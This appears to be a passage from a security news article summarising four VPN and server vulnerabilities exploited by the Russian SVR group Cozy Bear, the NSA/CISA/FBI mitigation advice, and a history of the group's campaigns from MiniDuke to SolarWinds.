CVE-2019-9670 – In the Synacor Zimbra Collaboration Suite, the mailboxd component has an XML External Entity injection (XXE) vulnerability.

CVE-2019-11510 – In Pulse Secure VPNs, an unauthenticated remote attacker can send a specially crafted Uniform Resource Identifier (URI) to perform an arbitrary file read. Pulse Secure VPNs have been a favorite for threat actors for some time, being used to gain access to US government networks, attack hospitals, and deploy ransomware on networks.

CVE-2019-19781 – Citrix Application Delivery Controller (ADC) and Gateway allow directory traversal. The CVE-2019-19781 exploit is known to be used by threat actors, including ransomware gangs, to gain access to corporate networks and deploy malware.

CVE-2020-4006 – VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector have a command injection vulnerability. In December 2020, the US government warned that Russian state-sponsored threat actors were exploiting this vulnerability to deploy web shells on vulnerable servers and exfiltrate data.

The report has given several mitigation steps for system owners:

NSA, CISA, and FBI recommend that critical system owners prioritize the following mitigation actions to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, ongoing operations, and competitive advantage. Additionally, due to the various systems and networks that could be impacted outside of these sectors, NSA, CISA, and FBI recommend that the following mitigations be prioritized for action by all network defenders.

While some vulnerabilities have specific additional mitigations below, the following general mitigations apply:

  • Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.
  • Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.
  • Disable external management capabilities and set up an out-of-band management network.
  • Block obsolete or unused protocols at the network edge and disable them in device configurations.
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.
  • Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.
  • Adopt a mindset that compromise happens: prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach’s full scope before remediating.

As the SVR/Cozy Bear has been utilizing a combination of these exploits in their attacks, it is strongly advised that all administrators install the associated security updates immediately.

The NSA warned last year that two of these exploits, CVE-2019-11510 and CVE-2019-19781, are also in the top 25 vulnerabilities utilized by China state-sponsored hackers.

History of the Group Abusing The Exploits: SVR/Cozy Bear

There is not a widely agreed upon date of Cozy Bear’s first appearance. Researchers have found traces in one of their malware strains, MiniDuke, that points to being active since 2008. Other sources note Cozy Bear first came to fame when hacking minor diplomatic entities in 2010.

As well as MiniDuke, Cozy Bear gained notoriety by developing several other malware strains in the early 2010s. These include CozyDuke, CosmicDuke, OnionDuke, HAMMERTOSS, PolyglotDuke, RegDuke, FatDuke, and SeaDuke.

Cozy Bear is known to program its malware in assembly language. Assembly is the lowest-level programming language in use, which highlights the group’s skills. Furthermore, assembly is the fastest language because of its closeness to the hardware; this gives their malware strains lightning-fast processing times.

In March 2014, a Washington, D.C.-based private research institute was found to have Cozyduke (Trojan.Cozer) on their network. Cozy Bear then started an email campaign attempting to lure victims into clicking on a flash video of office monkeys that would also include malicious executables. By July the group had compromised government networks and directed Cozyduke-infected systems to install Miniduke onto a compromised network.

In the summer of 2014, digital agents of the Dutch General Intelligence and Security Service infiltrated Cozy Bear. They found that these Russian hackers were targeting the US Democratic Party, State Department and White House. Their evidence influenced the FBI’s decision to open an investigation.

In August 2015 Cozy Bear was linked to a spear-phishing cyber-attack against the Pentagon email system causing the shut down of the entire Joint Staff unclassified email system and Internet access during the investigation.

In June 2016, Cozy Bear was implicated alongside the hacker group Fancy Bear in the Democratic National Committee cyber attacks. While the two groups were both present in the Democratic National Committee’s servers at the same time, they appeared to be unaware of the other, each independently stealing the same passwords and otherwise duplicating their efforts. A CrowdStrike forensic team determined that while Cozy Bear had been on the DNC’s network for over a year, Fancy Bear had only been there a few weeks. Cozy Bear’s more sophisticated tradecraft and interest in traditional long-term espionage suggest that the group originates from a separate Russian intelligence agency.

On February 3, 2017, the Norwegian Police Security Service (PST) reported that attempts had been made to spearphish the email accounts of nine individuals in the Ministry of Defence, Ministry of Foreign Affairs, and the Labour Party. The acts were attributed to Cozy Bear, whose targets included the Norwegian Radiation Protection Authority, PST section chief Arne Christian Haugstøyl, and an unnamed colleague. Prime Minister Erna Solberg called the acts “a serious attack on our democratic institutions.”

In February 2017, it was revealed that Cozy Bear and Fancy Bear had made several attempts to hack into Dutch ministries, including the Ministry of General Affairs, over the previous six months. Rob Bertholee, head of the AIVD, said on EenVandaag that the hackers were Russian and had tried to gain access to secret government documents.

Suspicions that Cozy Bear had ceased operations were dispelled in 2019 by the discovery of three new malware families attributed to Cozy Bear: PolyglotDuke, RegDuke and FatDuke. This shows that Cozy Bear did not cease operations, but rather had developed new tools that were harder to detect. Target compromises using these newly uncovered packages are collectively referred to as Operation Ghost.

And most recently, Cozy Bear was found to be behind the 2020 SolarWinds attack, a supply-chain attack that crippled large parts of the US. Given their history, and the number of critical exploits the internet is faced with now, it’s unlikely this will be the last we’ll hear of the group.
